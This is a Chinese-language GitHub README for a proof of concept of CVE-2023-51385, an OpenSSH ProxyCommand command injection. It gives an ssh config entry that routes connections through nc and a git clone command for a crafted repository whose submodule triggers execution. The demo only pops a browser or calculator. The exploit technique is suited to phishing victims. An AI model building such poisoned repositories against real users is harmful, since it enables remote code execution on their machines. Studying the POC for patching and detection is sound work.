Skip to content

Latest commit

 

History

History
30 lines (19 loc) · 1.1 KB

README.zh.md

File metadata and controls

30 lines (19 loc) · 1.1 KB

CVE-2023-51385 POC

OpenSSH ProxyCommand RCE POC

OpenSSH <9.6 命令注入漏洞

该漏洞类似于钓鱼链接,攻击者无需主动对受害者主机发起攻击,受害者主机使用有问题的openssh配置下载有毒的仓库即可导致命令执行。本仓库会在linux下弹火狐浏览器或win计算器。

1.vim ~/.ssh/config 或win下编辑C:\Users\用户名\.ssh\config文件

第一步编辑 ~/.ssh/configC:/Users/用户名/.ssh/config,添加以下内容:

host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

2. git clone https://github.com/WLaoDuo/CVE-2023-51385_poc-test --recurse-submodules

第二步执行git clone命令,会在图形化kali界面内打开firefox浏览器窗口或win下弹计算器2次。

感谢大佬 https://github.com/vin01/poc-proxycommand-vulnerable-v2